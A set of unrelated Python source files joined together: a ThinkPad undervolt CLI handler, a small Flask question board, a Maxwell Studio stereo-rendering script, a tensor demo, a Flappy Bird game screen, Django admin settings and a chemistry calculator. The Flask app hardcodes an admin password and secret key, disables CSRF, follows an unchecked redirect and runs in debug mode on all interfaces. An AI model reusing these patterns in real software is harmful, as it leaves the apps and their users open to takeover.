uncore=self.uncore,
analogio=self.analogio
)
class UndervoltHandler(object):
"""
Handler for Undervolt related commands
"""
def __init__(self):
self.parser: argparse.ArgumentParser = argparse.ArgumentParser(
prog='thinkpad-tools undervolt',
description='Undervolt related commands',
usage=USAGE_HEAD,
epilog=USAGE_EXAMPLES,
formatter_class=argparse.RawDescriptionHelpFormatter
)
self.parser.add_argument('verb', type=str, help='The action going to \
take')
self.parser.add_argument(
'arguments', nargs='*', help='Arguments of the action')
self.inner: Undervolt = Undervolt()
def run(self, unparsed_args: list):
"""
Parse and execute the command
:param unparsed_args: Unparsed arguments for this property
:return: Nothing
"""
def invalid_property(prop_name: str, exit_code: int):
"""
Print error message and exit with exit code 1
:param prop_name: Name of the property
:param exit_code: Exit code
:return: Nothing, the problem exits with the given exit code
"""
print(
'Invalid command "%s", available properties: ' % prop_name +
', '.join(self.inner.__dict__.keys()),
file=sys.stderr
)
exit(exit_code)
# Parse arguments
args: argparse.Namespace = self.parser.parse_args(unparsed_args)
verb: str = str(args.verb).lower()
# Read values from the system
self.inner.read_values()
# Commands
if verb == 'status':
print(self.inner.get_status_str())
return
if verb.startswith('set-'):
try:
prop: str = verb.split('-', maxsplit=1)[1]
except IndexError:
invalid_property(verb, 1)
return
if prop not in self.inner.__dict__.keys():
invalid_property(prop, 1)
self.inner.__dict__[prop] = str(''.join(args.arguments))
self.inner.set_values()
print(self.inner.get_status_str())
return
if verb.startswith('get-'):
try:
prop: str = verb.split('-', maxsplit=1)[1]
except IndexError:
invalid_property(verb, 1)
if not hasattr(self.inner, prop):
invalid_property(prop, 1)
if not self.inner.__dict__[prop]:
print('Unable to read %s' % prop)
exit(1)
print(self.inner.__dict__[prop])
return
# No match found
print('Command "%s" not found' % verb, file=sys.stderr)
exit(1)
|
from flask import Flask, render_template, redirect, url_for, request, flash
from sqlalchemy import Column, Integer, String, ForeignKey, Text, DateTime
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext import wtf
from flask.ext.login import LoginManager, login_required, UserMixin, login_user, logout_user
from datetime import datetime
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
app.config['PASSWD'] = 'test'
app.config["USER"] = "admin"
app.secret_key = r'Ma5Jeiquaix6EGhuo7chei1aeNaiLuor6ahfug3iehoh1aes'
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = "login"
login_manager.login_message = u"Sie müssen eingeloggt sein um die Fragen einzusehen."
class User(UserMixin):
id = 0
pw = app.config["PASSWD"]
name = app.config["USER"]
@staticmethod
def verify_and_get(username, passwd):
user = User()
if username == user.name and passwd == user.pw:
return user
return None
@login_manager.user_loader
def load_user(userid):
return User()
class LoginForm(wtf.Form):
username = wtf.TextField(label="Benutzename")
password = wtf.PasswordField(label="Passwort")
@app.route("/login", methods=["GET", "POST"])
def login():
form = LoginForm(csrf_enabled=False)
if form.validate_on_submit():
user = User.verify_and_get(form.username.data,
form.password.data)
if user is not None:
login_user(user)
flash(u"Erfolgreich eingeloggt.")
return redirect(request.args.get("next") or url_for("answers"))
else:
print "WURST"
flash(u"Falscher Benutzername und/oder Passwort")
return redirect(url_for("login"))
return render_template("login.html", form=form)
@app.route("/logout")
@login_required
def logout():
logout_user()
return redirect(url_for("question"))
class Referent(db.Model):
__tablename__ = "referent"
id = Column(Integer, primary_key=True)
name = Column(String)
def __repr__(self):
return self.name
class Comment(db.Model):
__tablename__ = "comment"
id = Column(Integer, primary_key=True)
to_id = Column(Integer, ForeignKey("referent.id"), nullable=True)
subject = Column(String, nullable=False)
body = Column(Text, nullable=False)
date = Column(DateTime, default=datetime.now)
to = db.relationship(Referent, backref=db.backref("comments", order_by=lambda:Comment.date))
def formatted_date(self):
return self.date.strftime("%d.%m %H:%M")
def get_referents():
return db.session.query(Referent).all()
class CommentForm(wtf.Form):
subject = wtf.TextField(label="Thema")
referent = wtf.QuerySelectField(query_factory=get_referents, label="Referent")
body = wtf.TextAreaField(label="Frage")
@app.route('/', methods=["GET", "POST"])
def question():
form = CommentForm(csrf_enabled=False)
if form.validate_on_submit():
new_question = Comment(to=form.referent.data,
subject=form.subject.data,
body=form.body.data)
db.session.add(new_question)
db.session.commit()
return redirect(url_for("thanks"))
return render_template("form.html", form=form)
@app.route("/thanks")
def thanks():
return render_template("thanks.html")
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/answers", defaults={"referent_id": None})
@app.route("/answers/<int:referent_id>")
@login_required
def answers(referent_id):
answers_qry = db.session.query(Referent)
if referent_id is not None:
answers_qry = answers_qry.filter_by(id=referent_id)
answers_refernts = answers_qry.all()
else:
answers_refernts = []
for answer in answers_qry:
if len(answer.comments):
answers_refernts.append(answer)
if request.is_xhr:
return render_template("answer_list.html", answers=answers_refernts)
return render_template("answers.html", referents=get_referents(), answers=answers_refernts)
@app.route("/referents")
@login_required
def referents():
all_referents = db.session.query(Referent).all()
return render_template("referents.html", referents=all_referents)
class ReferentForm(wtf.Form):
name = wtf.TextField(label="Name")
@app.route("/referents/add", methods=["GET", "POST"])
@login_required
def referent_add():
form = ReferentForm(csrf_enabled=False)
if form.validate_on_submit():
new_referent = Referent(name=form.name.data)
db.session.add(new_referent)
db.session.commit()
return redirect(url_for("referents"))
return render_template("referent_add.html", form=form)
if __name__ == '__main__':
app.debug=True
app.run(host="0.0.0.0")
|
# Automagic LatLong Stereo for Maxwell Studio
# --------------------------------------------
# 2015-11-30 9:15 am v0.3
# By Andrew Hazelden
# Email: andrew@andrewhazelden.com
# Blog: http://www.andrewhazelden.com
# Description
# -----------
# The automagicLatLongStereo.py script is used to quickly prepare your Maxwell Studio mxs scenes for rendering immersive 360 degree LatLong Stereo VR content.
# Script Installation
# -------------------
# Copy the "stereo" folder to your Maxwell 3.2 scripts directory:
# Windows
# C:/Program Files/Next Limit/Maxwell 3/scripts/
# Linux
# /opt/maxwell/3/scripts/
# Mac
# /Applications/Maxwell 3/scripts/
# How do I use the script?
# ------------------------
# Step 1.
# Edit your Maxwell MXS scene file so there is an active camera. Set the focus distance on the camera to the exact location in the scene that you want to use as the stereo camera rig's zero parallax distance (which is the convergence point for the left and right eyes).
# Step 2.
# Launch PyMaxwell and open up the `automagicLatLongStereo.py` python script.
# Step 3.
# Edit the "mxsFilePath" variable in the main function near the bottom of this script and specify your Maxwell Studio based MXS scene file.
# Edit the separationTexturePath variable in the main function near the bottom of this script and specify your LatLong Stereo separation map texture image.
# Edit the the camera views to render section in the main function near the bottom of this script and specify if you want to render the left, right, or center camera views.
# Step 4. Select the Script > Run menu item in PyMaxwell.
# The script will start running. First the script will verify the mxs scene file exists.
# If the mxs file is located then the scene will be opened in maxwell and the camera parameters will be edited. A LatLong Stereo lens shader extension is applied to the camera.
# Camera's focus distance value will be used as the parallax distance for the lens shader and a suitable camera separation value is calculated based upon the current "stereoDepthStrength" value that is specified in the main function at the bottom of this script.
# Then the lens shader's camera view is adjusted so a set of center, left and right camera view based scene files are generated with the names `<scene>_C.mxs`, `<scene>_L.mxs` and `<scene>.R.mxs`. These new files are saved to the same folder as the original mxs scene file.
# -----------------------------------------
from pymaxwell import *
from math import *
import os
import sys
# Return the lens type name as a string
# Example: it = CmaxwellCameraIterator(); camera = it.first(scene); cameraLens = cameraParams.getLensType(); aml_lensTypeName(cameraLens)
def aml_lensTypeName(cameraLens):
lensTypeName = ''
if cameraLens[0] == TYPE_CYLINDRICAL_LENS:
lensTypeName = 'Cylindrical'
elif cameraLens[0] == TYPE_EXTENSION_LENS:
lensTypeName = 'Extension Lens'
elif cameraLens[0] == TYPE_FISHEYE_LENS:
lensTypeName = 'Fisheye'
elif cameraLens[0] == TYPE_ORTHO_LENS:
lensTypeName = 'Ortho'
elif cameraLens[0] == TYPE_PINHOLE_LENS:
lensTypeName = 'Pinhole'
elif cameraLens[0] == TYPE_SPHERICAL_LENS:
lensTypeName = 'Spherical'
elif cameraLens[0] == TYPE_THIN_LENS:
lensTypeName = 'Thin'
return lensTypeName
# Automatically calibrate the current camera rig and prepare it for panoramic 360 degree stereo rendering:
# Example: automagicStereo('/Cube.mxs', 0.01)
def aml_automagicStereo(mxsFilePath, separationTexturePath, stereoDepthStrength):
print('\n\n')
print('Automagic LatLong Stereo for Maxwell Studio')
print('By Andrew Hazelden <andrew@andrewhazelden.com>')
print('-----------------------------------------------\n')
# Find out the current scene file
dirName = os.path.dirname(mxsFilePath)
sceneName = os.path.basename(mxsFilePath)
scenePathNoExt = os.path.splitext(mxsFilePath)[0]
# Find out the current scene
scene = Cmaxwell(mwcallback)
scene.readMXS(mxsFilePath)
it = CmaxwellCameraIterator()
# Camera Details
#camera = it.first(scene)
camera = scene.getActiveCamera()
cameraName = camera.getName()
# Return the lens type name as a string
cameraLens = camera.getLensType()
lensTypeName = aml_lensTypeName(cameraLens)
# Check if a lens shader is attached to the camera
lensExt = camera.hasCameraLensExtension()
# Camera Parameters
position,focalPoint,up,focalLength,fStop,stepTime,ok = camera.getStep(0)
# Get object position (camera target)
#target,ok = object.getPosition()
# Camera Resolution
res = camera.getResolution()
width = res[0]
height = res[1]
print('[Working Directory] ' + dirName)
print('[Input Scene] ' + sceneName + ' [Camera] ' + str(cameraName) + ' [Lens] ' + str(lensTypeName) + ' (' + str(cameraLens[0]) + ')' + ' [Lens Shader Present] ' + str(lensExt) + ' [Resolution] ' + str(width) + 'x' + str(height))
# -------------------------------------------------------
# Write the Left and Right stereo camera scenes to disk
# -------------------------------------------------------
# Switch the camera to a LatLong Stereo lens
latlong_stereo_lens_type = 6
ok = camera.setLensType(latlong_stereo_lens_type)
if ok == 0:
print('There was an error changing the lens type')
return 0
# Update the lens shader settings
if lensExt == 0:
print('\nNote: There are no lens shaders attached to the "' + cameraName + '" camera. You need to set the camera to use a LatLong Stereo lens in Maxwell Studio before running this script.')
return 0
# print('Assigning a new LatLong Stereo Lens to the "' + cameraName + '" camera.')
# Add the lens extension settings
# -------------------------------------------------
# Maxwell Python Lens Shader ParamList tips from: https://github.com/uhlik/blendmaxwell/blob/master/support/write_mxs.py
# print('\nNote: No lens shader is attached. Creating the default lens shader extension params.')
# params = MXparamList()
# params.createUInt('Type', 1, 0, 2)
# params.createFloat('FOV Vertical', 180.0, 180.0, 0.0)
# params.createFloat('FOV Horizontal', 360.0, 360.0, 0.0)
# params.createByte('Flip Ray X', 0, 0, 1)
# params.createByte('Flip Ray Y', 0, 0, 1)
# params.createFloat('Parallax Distance', 360.0, 0.0, 36000.0)
# params.createByte('Zenith Mode', 0, 0, 1)
# params.createFloat('Separation', 6.5, 0.0, 100000.0)
# Set the lens shader's stereo separation texture map
# if os.path.exists(separationTexturePath):
# Note: setPath is from CtextureMap and createTextureMap is from MXparamList
# tex = CtextureMap()
# tex.setPath(separationTexturePath)
# params.createTextureMap('Separation Map', tex)
#camera.applyCameraLensExtension(params)
# Alternate code to add the lens extension settings
# -------------------------------------------------
# param = MXparamList()
# param.setUInt('Type', 1)
# param.setFloat('FOV Vertical', 180.0)
# param.setFloat('FOV Horizontal', 360.0)
# param.setByte('Flip Ray X', 0)
# param.setByte('Flip Ray Y', 0)
# param.setFloat('Parallax Distance', 360.0)
# param.setByte('Zenith Mode', 0)
# param.setFloat('Separation', 6.5)
# Set the lens shader's stereo separation texture map
# if os.path.exists(separationTexturePath):
# setPath is from CtextureMap and setTextureMap is from MXparamList
# tex = CtextureMap()
# tex.setPath(separationTexturePath)
# param.setTextureMap('Separation Map', tex)
# print('[Separation Map Texture] ' + separationTexturePath )
# else:
# print('[The separation map image was not found] ' + separationTexturePath)
#camera.applyCameraLensExtension(param)
else:
print('[LatLong Stereo Lens Shader Present on Camera]')
# Return the lens type name as a string
cameraLens = camera.getLensType()
lensTypeName = aml_lensTypeName(cameraLens)
# Set the camera resolution to a 2:1 aspect ratio
outputWidth = height * 2
outputHeight = height
camera.setResolution(outputWidth, outputHeight)
# Convert the focal point or target distance in meters to the lens shader's parallax distance in cm
x = abs(position[0]-focalPoint[0])
y = abs(position[1]-focalPoint[1])
z = abs(position[1]-focalPoint[2])
focalPointDistance = float(sqrt((x*x)+(y*y)+(z*z)))
parallaxDistance = focalPointDistance * 100.0
# Round parallaxDistance to 4 digits of floating point precision
parallaxDistance = round(parallaxDistance , 4)
# Use a strong stereo depth strength
# cameraSeparation = parallaxDistance * (1.0/30.0)
# Use a standard stereo depth strength
# cameraSeparation = parallaxDistance * (1.0/55.0)
# Use a gentle stereo depth strength
# cameraSeparation = parallaxDistance * (1.0/120.0)
# Pull the stereo depth multiplier from the script's main function
cameraSeparation = parallaxDistance * stereoDepthStrength
# Round cameraSeparation to 4 digits of floating point precision
cameraSeparation = round(cameraSeparation, 4)
# ToDo: Assign a gradient3 procedural with a vertical gradient effect / premade camera stereo control texture map
# Find out the lens params
# pymaxwell.MXparamList:
# http://www.maxwellrender.com/api/3.2/doc-python/html/classpymaxwell_1_1_m_xparam_list.html
lensParams, ok = camera.getCameraLensExtensionParams()
if ok == 0:
print('There was an error changing the lens type')
return 0
# Set the parallax distance
lensParams.setFloat('Parallax Distance', parallaxDistance)
# Set the camera separation aka. interaxial pupil distance
lensParams.setFloat('Separation', cameraSeparation)
# Set the lens shader's stereo separation texture map
if os.path.exists(separationTexturePath):
# setTextureMap is from MXparamList
# setPath is from CtextureMap
tex = CtextureMap()
tex.setPath(separationTexturePath)
ok = lensParams.setTextureMap('Separation Map', tex)
print('[Separation Map Texture] ' + separationTexturePath )
else:
print('[Separation Map Image Not Found] ' + separationTexturePath)
# Read the lens param items
mx_type = lensParams.getByName('Type')
mx_fovVertical = lensParams.getByName('FOV Vertical')
mx_fovHorizontal = lensParams.getByName('FOV Horizontal')
mx_flipRayX = lensParams.getByName('Flip Ray X')
mx_flipRayY = lensParams.getByName('Flip Ray Y')
mx_parallaxDistance = lensParams.getByName('Parallax Distance')
mx_zenithMode = lensParams.getByName('Zenith Mode')
mx_separation = lensParams.getByName('Separation')
mx_separationMap = lensParams.getTextureMap('Separation Map')
mx_separationMapFileTexture = mx_separationMap[0].getPath()
print('\n--------------------------------------')
print('LatLong Stereo Lens Shader Attributes')
print('--------------------------------------')
print('[Lens Type] ' + str(lensTypeName) + ' (' + str(cameraLens[0]) + ')' )
print('[Lens Parameter Array Items] ' + str(lensParams.getNumItems()) )
print('Type: ' + str(mx_type) )
print('FOV Vertical: ' + str(mx_fovVertical) )
print('FOV Horizontal: ' + str(mx_fovHorizontal) )
print('Flip Ray X: ' + str(mx_flipRayX) )
print('Flip Ray Y: ' + str(mx_flipRayY) )
print('Parallax Distance: ' + str(mx_parallaxDistance) )
print('Zenith Mode: ' + str(mx_zenithMode) )
print('Separation: ' + str(mx_separation) )
print('Separation Map: ' + str(mx_separationMap) )
print('Separation Map Texture: ' + str(mx_separationMapFileTexture) )
print('--------------------------------------\n')
# Read the camera type UInt value
activeCameraType = lensParams.getUInt('Type')[0]
#print('[Camera View Type] ' + str(activeCameraType) )
# Read the camera parallax distance Float value
activeParallaxDistance = lensParams.getFloat('Parallax Distance')[0]
#print('[Parallax Distance] ' + str(activeParallaxDistance) )
# Read the camera separation Float value
activeCameraSeparation= lensParams.getFloat('Separation')[0]
#print('[Camera Separation] ' + str(activeCameraSeparation )
# --------------------------------------------------------
# Save the Center Camera
# Switch the lens shader camera view to center
cameraType = 0
lensParams.setUInt('Type', cameraType)
activeCameraType = lensParams.getUInt('Type')[0]
centerFilename = scenePathNoExt + '_C.mxs'
print('[Center MXS Scene] ' + os.path.basename(centerFilename) + ' [Lens] ' + 'LatLong Stereo' + ' [Camera View] ' + str(activeCameraType) + ' [Resolution 2:1 Ratio] ' + str(outputWidth) + 'x' + str(outputHeight) + ' [Parallax Distance CM] ' + str(activeParallaxDistance) + ' [Separation CM] ' + str(activeCameraSeparation))
ok = scene.writeMXS(centerFilename)
if ok == 0:
print('There was an error saving: ' + centerFilename)
return 0
# --------------------------------------------------------
# Save the Left Camera
# Switch the lens shader camera view to left
cameraType = 1
lensParams.setUInt('Type', cameraType)
activeCameraType = lensParams.getUInt('Type')[0]
leftFilename = scenePathNoExt + '_L.mxs'
print('[Left MXS Scene] ' + os.path.basename(leftFilename) + ' [Lens] ' + 'LatLong Stereo' + ' [Camera View] ' + str(activeCameraType) + ' [Resolution 2:1 Ratio] ' + str(outputWidth) + 'x' + str(outputHeight) + ' [Parallax Distance CM] ' + str(activeParallaxDistance) + ' [Separation CM] ' + str(activeCameraSeparation))
ok = scene.writeMXS(leftFilename)
if ok == 0:
print('There was an error saving: ' + leftFilename)
return 0
# Todo: Change the lens shader camera view to Right
# --------------------------------------------------------
# Save the Right Camera
# Switch the lens shader camera view to right
cameraType = 2
lensParams.setUInt('Type', cameraType)
activeCameraType = lensParams.getUInt('Type')[0]
rightFilename = scenePathNoExt + '_R.mxs'
print('[Right MXS Scene] ' + os.path.basename(rightFilename) + ' [Lens] ' + 'LatLong Stereo' + ' [Camera View] ' + str(activeCameraType) + ' [Resolution 2:1 Ratio] ' + str(outputWidth) + 'x' + str(outputHeight) + ' [Parallax Distance CM] ' + str(activeParallaxDistance) + ' [Separation CM] ' + str(activeCameraSeparation))
ok = scene.writeMXS(rightFilename)
if ok == 0:
print('There was an error saving: ' + rightFilename)
return 0
print('\n--------------------------------------')
print('Automagic Scene Setup Complete')
return 1
# Render the stereo project files
# Example: aml_renderStereo('C:/Program Files/Next Limit/Maxwell 3/scripts/stereo/CubeX.mxs', 0, 1, 1)
def aml_renderStereo(mxsFilePath, centerView, leftView, rightView, imageExtension):
# Find out the current scene file
dirName = os.path.dirname(mxsFilePath)
sceneName = os.path.basename(mxsFilePath)
scenePathNoExt = os.path.splitext(mxsFilePath)[0]
# Generate the scene and image file names
centerFilename = scenePathNoExt + '_C.mxs'
centerImagename = scenePathNoExt + '_C.' + imageExtension
leftFilename = scenePathNoExt + '_L.mxs'
leftImagename = scenePathNoExt + '_L.' + imageExtension
rightFilename = scenePathNoExt + '_R.mxs'
rightImagename = scenePathNoExt + '_R.' + imageExtension
print('\n--------------------------------------')
print('LatLong Stereo Rendering')
if centerView == 1:
if os.path.exists(centerFilename):
print('Rendering the Center Camera View')
parameters = []
parameters.append('-mxs:' + centerFilename)
parameters.append('-display')
parameters.append('-o:' + centerImagename)
parameters.append('-p:low')
print('[Parameters] ' + str(parameters))
runMaxwell(parameters)
else:
print('[Center View MXS file not found] ' + centerFilename)
if leftView == 1:
if os.path.exists(leftFilename):
print('Rendering the Left Camera View')
parameters = []
parameters.append('-mxs:' + leftFilename)
parameters.append('-display')
parameters.append('-o:' + leftImagename)
parameters.append('-p:low')
print('[Parameters] ' + str(parameters))
runMaxwell(parameters)
else:
print('[Left View MXS file not found] ' + centerFilename)
if rightView == 1:
if os.path.exists(rightFilename):
print('Rendering the Right Camera View')
parameters = []
parameters.append('-mxs:' + rightFilename)
parameters.append('-display')
parameters.append('-o:' + rightImagename)
parameters.append('-p:low')
print('[Render Parameters] ' + str(parameters))
runMaxwell(parameters)
else:
print('[Right View MXS file not found] ' + centerFilename)
print('--------------------------------------')
print('The Automagic rendering stage is complete!')
# This code is the "main" section that is run automatically when the python script is loaded in pyMaxwell:
if __name__ == "__main__":
# Choose a Maxwell MXS scene file to process:
#mxsFilePath = '/Applications/Maxwell 3/scripts/stereo/CubeX.mxs'
mxsFilePath = 'C:/Program Files/Next Limit/Maxwell 3/scripts/stereo/CubeX.mxs'
#mxsFilePath = '/opt/maxwell-3.2/scripts/stereo/CubeX.mxs'
#mxsFilePath = '/home/andrew/maxwell-3.2/scripts/stereo/CubeX.mxs'
# Choose a LatLong Stereo Separation Texture Map:
#separationTexturePath = '/Applications/Maxwell 3/scripts/stereo/textures/separation_map.png'
separationTexturePath = 'C:/Program Files/Next Limit/Maxwell 3/scripts/stereo/textures/separation_map.png'
#separationTexturePath = '/opt/maxwell-3.2/scripts/stereo/textures/separation_map.png'
#separationTexturePath = '/home/andrew/maxwell-3.2/scripts/stereo/textures/separation_map.png'
# Choose a stereo depth ratio.
# ----------------------------------------
# This is a value like (1/100) or (1.0/55.0) which will be used to calculate a comfortable camera separation value. The camera's current focus distance is applied as the parallax distance value using the following math:
# Example: camera separation (in cm) = parallax distance (in cm) * stereoDepthStrength
# Example: 6.5 = 360 * (1/55)
# Use a strong stereo depth ratio
#stereoDepthStrength = (1.0/30.0)
# Use a medium stereo depth ratio
stereoDepthStrength = (1.0/55.0)
# Use a standard stereo depth ratio
#stereoDepthStrength = (1.0/100.0)
# Use a gentle stereo depth ratio
#stereoDepthStrength = (1.0/120.0)
# Camera Views to Render
# ----------------------------------
# Set each of the views to 1 to render, and 0 to skip rendering
leftView = 1
rightView = 1
centerView = 0
# Launch the automagic stereo camera set up command
if os.path.exists(mxsFilePath):
# Generate the stereo project files
ok = aml_automagicStereo(mxsFilePath, separationTexturePath, stereoDepthStrength)
if ok == 1:
# Render the stereo project files
aml_renderStereo(mxsFilePath, centerView, leftView, rightView, 'png')
else:
print('[MXS File Not Found] ' + mxsFilePath)
|
#!/usr/bin/env python3
import numpy as np
import torch
from itypes import TorchStruct
device = torch.device('cuda:0')
print()
s = TorchStruct(dims="hwc")
s.x = torch.tensor([[[1, 2, 3], [4, np.nan, np.inf]]], device=device)
s.y = TorchStruct(dims="hwc")
s.y.z = torch.tensor([[7, 8, 9], [10, np.nan, np.inf]], device=device)
print("s:")
print(s)
print('s.x:')
print(s.x)
print('s.y.z:')
print(s.y.z)
print()
print('nan_to_num result:')
# NOTE: s is unchanged
q = s.nan_to_num()
print("q:")
print(q)
print('q.x:')
print(q.x)
print('q.y.z:')
print(q.y.z)
print()
print("to_hwc result:")
# NOTE: s is unchanged
q = s.to_hwc()
print("q:")
print(q)
print()
print("to_chw result:")
# NOTE: s is unchanged
q = s.to_chw()
print("q:")
print(q)
print()
print("to_bhwc result:")
# NOTE: s is unchanged
q = s.to_bhwc()
print("q:")
print(q)
print()
print("to_bchw result:")
# NOTE: s is unchanged
q = s.to_bchw()
print("q:")
print(q)
print()
s = s.to_bchw()
s.int_value = 2
s.list = [2, 3]
q = s.concat_batch([s, s])
print("after concat batch:")
print(q)
print()
print('after modify:')
q.int_value[0] = 5
q.float_value = 2.3
print(q)
print()
a, b = q.split_batch()
print('split_batch first entry:')
print(a)
print('split_batch second entry:')
print(b)
print()
print('to cpu:')
q = s.to('cpu')
print("q:")
print(q)
print()
print('to numpy:')
q = s.to_numpy()
print("q:")
print(q)
print()
print('back to GPU:')
q = q.to(device)
print("q:")
print(q)
print()
print('after clone:')
q = q.clone()
print("q:")
print(q)
print()
|
import pygame as pg
import logging
from random import randint
from flappy.configs.configs import Configs
from flappy.controlador.pg_utils import carregar_sprites, som
from flappy.entidades.flappy import Flappy
from flappy.entidades.score import Score
from flappy.entidades.terreno import Terreno
from flappy.entidades.canos import Canos
from flappy.telas.game_over import GameOver
from flappy.telas.tela import TelaBase
class Jogo(TelaBase):
def __init__(self, tela_pg):
TelaBase.__init__(self, tela_pg, proxima=GameOver)
# TODO: contar arquivos da pasta ao inves de carregar tudo
fundos = carregar_sprites("bg")
# Gera um fundo aleatório entre os que estão na pasta.
indice_fundo_aleatorio = randint(0, len(fundos) - 1)
self.bg = fundos[indice_fundo_aleatorio]
self.flappy = Flappy(tela_pg)
self.terreno = Terreno(tela_pg)
self.canos1 = Canos(tela_pg)
self.canos2 = Canos(tela_pg)
self.canos2.rect.x += (Configs.TELA_LARGURA + self.canos2.imagem.get_width()) / 2
self.score = Score(tela_pg)
# self.sprites.append(self.bg)
# self.sprites.append(self.terreno)
self.atalhos_teclado[pg.K_SPACE] = self.flappy.pular
def desenhar(self):
self.tela_pg.blit(self.bg, self.bg.get_rect())
# TODO: desenhar score
self.canos1.desenhar()
self.canos2.desenhar()
self.terreno.desenhar()
self.flappy.desenhar()
self.score.desenhar()
# Passou um cano, adiciona ao score e toca o efeito sonoro
if self.flappy.rect.x in (self.canos1.rect.x, self.canos2.rect.x):
som("point")
self.score.incrementar_score()
# TODO: animação de morte, tela de game over
objetos_colisao = [self.canos1, self.canos2, self.terreno]
for objeto in objetos_colisao:
if objeto.colisao(self.flappy):
som("hit")
logging.info(f"Flappy colidiu com '{objeto.__class__}'")
self.canos1.movimentar = False
self.canos2.movimentar = False
self.flappy.movimentar = False
self.atalhos_teclado = {}
pg.time.wait(1000)
self.proxima = GameOver
self.finalizar()
break
|
from django.contrib import admin
from . import models
@admin.register(models.Cabinet)
class CabinetAdmin(admin.ModelAdmin):
list_display_links = ('cabinet_number', )
search_fields = ('cabinet_number', )
list_filter = ('cabinet_set__branch', )
list_display = ('id', 'cabinet_number', 'cabinet_set', 'xpos', 'ypos',
'is_clean', 'user')
list_per_page = 10
@admin.register(models.CabinetSet)
class CabinetSetAdmin(admin.ModelAdmin):
list_display_links = ('desc', )
list_filter = (
'branch__branch_name',
'branch__branch_num',
)
list_display = (
'desc',
'branch',
)
# @admin.register(models.UseCabinet)
# class UseCabinetAdmin(admin.ModelAdmin):
# list_display_links = ('cabinet', )
# search_fields = (
# 'user_name',
# 'user_username',
# )
# list_filter = ('cabinet__cabinet_set__branch', )
# list_display = (
# 'cabinet',
# 'user',
# 'start_date',
# 'end_date',
# 'is_usable',
# )
@admin.register(models.CabinetAction)
class CabinetActionAdmin(admin.ModelAdmin):
list_display_links = (
'substance',
'kr_substance',
)
list_display = (
'substance',
'kr_substance',
)
@admin.register(models.CabinetHistory)
class CabinetHistoryAdmin(admin.ModelAdmin):
list_display_links = ('cabinet', )
search_fields = (
'user_name',
'user_username',
)
list_filter = ('cabinet__cabinet_set__branch', )
list_display = (
'cabinet',
'user',
'start_date',
'end_date',
'cabinet_action',
)
@admin.register(models.CabinetLock)
class CabinetLockAdmin(admin.ModelAdmin):
list_display_links = ('lock_number', )
search_fields = (
'lock_number',
'cabinet__cabinet_number',
)
list_filter = ('branch', )
list_display = (
'branch',
'cabinet',
'lock_number',
'lock_password',
)
|
import numpy as np #https://numpy.org/
import chemparse #https://pypi.org/project/chemparse/
from mendeleev import element #https://github.com/lmmentel/mendeleev
version = 0.12
date = "02/2022"
def printHelp():
'''Print the help dialog'''
print('================= Manuca Help =================')
print('Usage: Enter a stoichiometric formula (e.g. H2O) and confirm with ENTER. Type "q" to quit. Enter "multi" to construct a multi-compound sample, see below.')
print('The input is read with chemparse, which can handle complicated formulas with one level of parentheses, e.g. (Mg0.7Zn0.3)5H2(AsO4)4(H2O)10 (ICSD entry 267). ')
print('Note: chemparse currently only handles non-nested paretheses. A formula with nested parentheses like "CH3(C2(CH3)2)3CH3" will not work properly. Please use the "multi" option instead to construct such a compound.')
print('\nThe program will calculate and output various properties:')
print(' "Chemical formula" -> The parsed formula read from the user input.')
print(' "Composition table" -> Composition in atomic % (at.%) and weight % (wt.%).')
print(' "Mean atomic number" -> Various forms of the mean atomic number as listed in Howell et al, Scanning 20 (1998):')
print(' "Mueller (1954) -> Mueller, Phys. Rev. 93, 891 (1954).')
print(' "Saldick & Allen (1954) --> Saldick and Allen, J Chem Phys 22 (1954).')
print(' "Joyet (1954) -> Joyet et al, The Dosage of Gamma Radiation at Very High Energies. The Brown Boveri Betatron, (1954).')
print(' "Joyet (1954) -> Hohn and Niedrig: Elektronrenrückstreuung an dünnen Metall-undIsolatorschichten. Optik 35 (1972)')
print(' "Joyet (1954) -> Buechner, Bestimmung der mittleren Ordnungszahl vonLegierungen bei der quantitativen Mikrosondenanalyse, Arch Eisenhüttenwesen 44 (1973)')
print(' "Everhart (1960) -> Everhart, Simple theory concerning the reflection of electrons from solids. J Appl Phys 31 (1960)')
print(' "Other properties" -> Other compound properties which can be calculated from the stoichiometry.')
print(' "Zeff (Egerton, EFTEM)" -> Eq. (5.4) from Egerton, Electron Energy-Loss Spectroscopy in the Electron Microscope, Springer (2011)')
print(' "Aeff (Egerton, EFTEM)" -> Effective atomic mass for EFTEM.')
print(' "Tot. at. mass" -> Total atomic/molecular mass in g/mol.')
print(' "Avg. at. mass" -> Average atomic/molecular mass in g/mol.')
print('\nUsing "multi" to construct multi-compound samples:')
print(' (1) Type "multi" to start the dialog.')
print(' (2) Enter the number of "sub-compounds" you want to mix (e.g. 3).')
print(' (3) For each sub-compound, specify the stoichiometry and relative concentration. For the latter you can use any relative concentration numbers, as their sum will be used to normalize the concentrations. Example: Mixing 3 compounds with a relative ratio 20%, 30%, and 50% can be done with (2, 3, 5) as well as (20, 30, 50) as well as (40, 60, 100).')
print('\nManuca is based on the following Python packages. Please cite them if you find use in Manuca.')
print(' NumPy (https://numpy.org/), chemparse (https://pypi.org/project/chemparse/) , mendeleev (https://github.com/lmmentel/mendeleev)')
print(f'Manuca version: {version}, {date}, Author: Lukas Gruenewald')
print('==============================================')
def multi_compound(n_comp):
'''Create multi-compound from n_comp compounds'''
#mc stores compounds
mc_in = np.zeros(n_comp, dtype=[('comp', 'U500'),('conc', 'f4')])
#Grab and store sub-compound strings and relative concentrations from user input
for i in range(n_comp):
print(f'Compound {i+1} of {n_comp}.')
comp = input('Enter stoichiometry: ')
rel_conc = input('Enter relative concentration: ')
mc_in[i] = (comp, rel_conc)
#Total concentration for normalization
mc_in['conc'] /= np.sum(mc_in['conc'])
#Initialize Complete string
S = ''
#Parse each compound, weight with normalized concentration factor, and append to S
for i, c in enumerate(mc_in['comp']):
d = chemparse.parse_formula(c)
#Normalize each compound, not useful?
#d_sum = sum(d.values())
#d.update((x, np.round(y/d_sum,4)) for x, y in d.items())
#Weight with user input
d.update((x, np.round(y*mc_in['conc'][i],4)) for x, y in d.items())
for ele, r in d.items():
S += ele
S += str(r)
return S
print(f'Manuca - Mean Atomic Number calculator (v{version})')
print('Enter "help" to show further information. Enter "q" to quit. Enter "multi" to construct a multi-compound sample.')
